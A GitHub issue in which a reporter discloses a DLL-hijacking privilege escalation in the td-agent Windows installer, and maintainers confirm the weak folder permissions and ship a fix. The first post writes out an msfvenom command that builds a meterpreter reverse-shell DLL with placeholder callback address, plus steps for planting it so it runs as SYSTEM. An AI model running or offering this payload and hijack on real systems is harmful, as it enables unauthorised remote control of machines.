Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Possible Vulnerability #3201

Closed
zubrahzz opened this issue Dec 11, 2020 · 7 comments
Closed

Possible Vulnerability #3201

zubrahzz opened this issue Dec 11, 2020 · 7 comments
Assignees

Comments

@zubrahzz
Copy link

POC.docx
Describe the bug
Inappropriate folder permissions, possible escalation of privileges' on Windows

To Reproduce
Download URL:
http://packages.treasuredata.com.s3.amazonaws.com/4/windows/td-agent-4.0.1-x64.msi
Vulnerable Path:
C:\opt\td-agent\bin

Steps in reproducing the exploit:
Creating a DLL containing a reverse shell with the specific name that ruby.exe will search:
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=IPADRRESS LPORT=PORT > CRYPTBASE.dll
Setting up MSF console to listen for connection.
Copying the DLL file that we created to “C:\opt\td-agent\bin” using a limited account:
Normally, a limited user might not have the possibility of restarting the service.
A potential attacker can wait for the service to be restarted or he can restart the machine from command line; when the service restarts, it will trigger the DLL and get NT Authority.

Expected behavior
N/A

Your Environment
Windows10

If you hit the problem with older fluentd version, try latest version first.

Your Configuration

Default

Your Error Log

No errors.
Additional context

Please add an appropriate contact method to submit possible vulnerabilities and POC's.

@kenhys kenhys added the bug label Dec 18, 2020
@kenhys kenhys self-assigned this Dec 18, 2020
@kenhys
Copy link
Contributor

kenhys commented Dec 25, 2020

Yes,

It seems that inappropriate permission is set.

PS C:\> icacls.exe .\opt\td-agent\bin\
.\opt\td-agent\bin\ BUILTIN\Administrators:(I)(OI)(CI)(F)
                    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                    BUILTIN\Users:(I)(OI)(CI)(RX)
                    NT AUTHORITY\Authenticated Users:(I)(M)
                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)

@kenhys
Copy link
Contributor

kenhys commented Dec 25, 2020

note: In constract to program files.

C:\> icacls.exe 'C:\Program Files\'
C:\Program Files\ NT SERVICE\TrustedInstaller:(F)
                  NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                  NT AUTHORITY\SYSTEM:(M)
                  NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                  BUILTIN\Administrators:(M)
                  BUILTIN\Administrators:(OI)(CI)(IO)(F)
                  BUILTIN\Users:(RX)
                  BUILTIN\Users:(OI)(CI)(IO)(GR,GE)
                  CREATOR OWNER:(OI)(CI)(IO)(F)
                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)(GR,GE)
                  APPLICATION PACKAGE AUTHORITY\制限されたすべてのアプリケーション パッケージ:(RX)
                  APPLICATION PACKAGE AUTHORITY\制限されたすべてのアプリケーション パッケージ:(OI)(CI)(IO)(GR,GE)

@kenhys
Copy link
Contributor

kenhys commented Dec 25, 2020

We need to fix in wixtoolset source layer.

ref. https://github.com/fluent-plugins-nursery/td-agent-builder/blob/master/td-agent/msi/source.wxs

@cosmo0920
Copy link
Contributor

td-agent 4 fix is here:
fluent/fluent-package-builder#247

@kenhys
Copy link
Contributor

kenhys commented Dec 25, 2020

@kenhys kenhys added the windows label Dec 25, 2020
@kenhys
Copy link
Contributor

kenhys commented Jan 20, 2021

I'll close this issue when td-agent 4.1.0 is released.

FYI: fluent/fluent-package-builder#248

@kenhys
Copy link
Contributor

kenhys commented Mar 18, 2021

https://td-agent-package-browser.herokuapp.com/4/windows
4.1.0 has been released.

@kenhys kenhys closed this as completed Mar 18, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

3 participants